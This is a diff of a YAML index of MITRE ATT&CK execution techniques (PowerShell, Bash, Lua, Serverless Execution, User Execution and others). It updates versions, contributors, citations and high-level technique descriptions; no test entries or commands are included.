-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -26103,7 +26412,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26118,7 +26431,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -26145,6 +26458,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26155,15 +26472,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -26180,7 +26501,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26228,7 +26549,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -26261,12 +26582,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26327,8 +26647,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -26350,12 +26671,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26433,14 +26753,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26498,36 +26817,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26548,25 +26842,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26595,7 +26974,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26622,30 +27001,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26662,9 +27023,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26672,21 +27034,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26736,28 +27114,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26768,32 +27129,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26836,12 +27209,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26898,11 +27270,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26967,14 +27338,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26995,14 +27365,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -27011,16 +27386,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -27046,6 +27423,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -27060,29 +27445,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -27095,25 +27461,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
